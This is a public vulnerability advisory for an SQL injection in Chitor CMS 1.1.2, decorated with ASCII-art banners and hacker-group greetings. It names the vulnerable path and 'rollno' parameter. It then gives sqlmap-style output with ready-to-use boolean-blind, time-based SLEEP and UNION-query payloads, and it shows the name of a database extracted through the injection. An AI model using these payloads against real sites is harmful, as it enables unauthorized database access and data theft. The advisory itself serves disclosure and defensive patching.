Headline
Chitor CMS 1.1.2 SQL Injection
Chitor CMS version 1.1.2 suffers from a remote SQL injection vulnerability. The rollno parameter is also susceptible to SQL injection. Original discovery of this finding is attributed to msd0pe in April of 2023.
┌┌───────────────────────────────────────────────────────────────────────────────────────┐││ C r a C k E r ┌┘┌┘ T H E C R A C K O F E T E R N A L M I G H T ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ [ Vulnerability ] ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘: Author : CraCkEr :│ Website : https://github.com/waqaskanju/Chitor-CMS ││ Vendor : Waqas Ahmad ││ Software : Chitor-CMS 1.1.2 ││ Vuln Type: SQL Injection ││ Impact : Database Access ││ ││────────────────────────────────────────────────────────────────────────────────────────││ ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘: :│ Release Notes: ││ ═════════════ ││ ││ SQL injection attacks can allow unauthorized access to sensitive data, modification of ││ data and crash the application or make it unavailable, leading to lost revenue and ││ damage to a company's reputation. ││ │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ © CraCkEr 2023 ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /dmc.phphttps://website/dmc.php?rollno=[SQLI]&submit=GET parameter 'rollno' is vulnerable to SQLI[+] Starting the Attack---Parameter: rollno (GET) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: rollno=(SELECT (CASE WHEN (8157=8157) THEN 123 ELSE (SELECT 6602 UNION SELECT 8316) END))&submit=1 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: rollno=123 AND (SELECT 1046 FROM (SELECT(SLEEP(5)))WFHu)&submit=1 Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: rollno=123 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627871,0x795671465a5a414e7252507a55426e644b53514b45556c7a554f73727674517276705877617a5541,0x71627a7171),NULL,NULL,NULL-- -&submit=1---[INFO] the back-end DBMS is MySQLweb application technology: PHPback-end DBMS: MySQL >= 5.0.12 (MariaDB fork)[INFO] fetching current databasecurrent database: '***0611***_chitor_db'[-] Done